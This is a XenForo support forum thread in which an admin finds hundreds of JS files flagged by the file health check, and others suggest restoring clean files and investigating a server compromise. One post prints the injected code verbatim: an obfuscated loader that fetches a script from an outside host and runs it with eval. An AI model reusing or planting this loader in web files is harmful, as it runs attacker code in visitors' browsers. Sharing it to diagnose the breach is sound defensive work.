XF 2.1 File health check problem, all JS files showing Unexpected contents

Mian Shahid

Mian Shahid

Well-known member
Hi, my ACP showing File health Check warning having Unexpected contents in almost all JS files, including XF core files and all addons JS files.

I am using XF 2.1.1, is this due to any major change in XF core or it belongs to my own?

2021-05-11_215417.webp

Previous 8 are the updates XF released after 2.1.1, but on May 5, 2021 the number of files increased from 8 to 327 and all on them are JS files for example:

2021-05-11_220330.webp

Any Idea other then Re-installing XF, because we have few template modification which will wipe off if we re install the script.
 
Solution
P
Extract the files which have failed the check from the upgrade archive, and upload them again.

You will want to investigate how they came to be changed on the server.
Sort by date Sort by votes
Extract the files which have failed the check from the upgrade archive, and upload them again.

You will want to investigate how they came to be changed on the server.
 
Upvote 1 Downvote
Solution
Ditto, the same or similar issue....

xenforo.com

Compromised server?

Twice in the past week 287 js files within my forum and testforum (same server, different directories) have been reported as having 'Unexpected content', the latest event was today. Also the 'service_worker.js' and 'src/vendor/joypixels/emoji-toolkit/..' I've restored them from a backup. Is...
xenforo.com xenforo.com

XF2.2.5 & XF2.2.4
 
Upvote 0 Downvote
I have tested few different JS files some from XF and few from addons, and found the following code inserted at end of each JS file

Code: 
;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//itdarasgah.com/ITDQuiz/admin/images/combine/combine.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};

This meant, the problem is from server side, so I am going to change my all JS with original from XF, and will contact with server provider, it might be some sort of attack which may be not only effected my board but few other on same server too.

any further expert opinion? what to do, and what not? beside of changing all JS file, Thanks for all who commented to detect/solve my issue.
 
Upvote 0 Downvote
Since you have the same problem as @webbouk I'll link my reply to his thread here too for visibility

xenforo.com

Compromised server?

Twice in the past week 287 js files within my forum and testforum (same server, different directories) have been reported as having 'Unexpected content', the latest event was today. Also the 'service_worker.js' and 'src/vendor/joypixels/emoji-toolkit/..' I've restored them from a backup. Is...
xenforo.com xenforo.com
 
Upvote 0 Downvote
You must log in or register to reply here.

Similar threads

S
  • Question Question
XF 2.1 Health check problem (Dragula.js) (SOLVED)
Replies
7
Views
365
djbaxter
D
A
  • Question Question
After update to 2.0.10 file health check says there are 413 files with unexpected content - What can we do now???
Replies
11
Views
2K
argy
A
Martok
  • Question Question
XF 1.2 File Health Check problem
Replies
6
Views
966
Martok
Martok
dotgarden
  • Question Question
XF 1.1 File Health Check problem
Replies
3
Views
691
dotgarden
dotgarden
Dedy
  • Question Question
XF 1.1 File Health Check Problem (library/XenForo/DataWriter/User.php)
Replies
13
Views
2K
Jon W
Jon W
Back
Top Bottom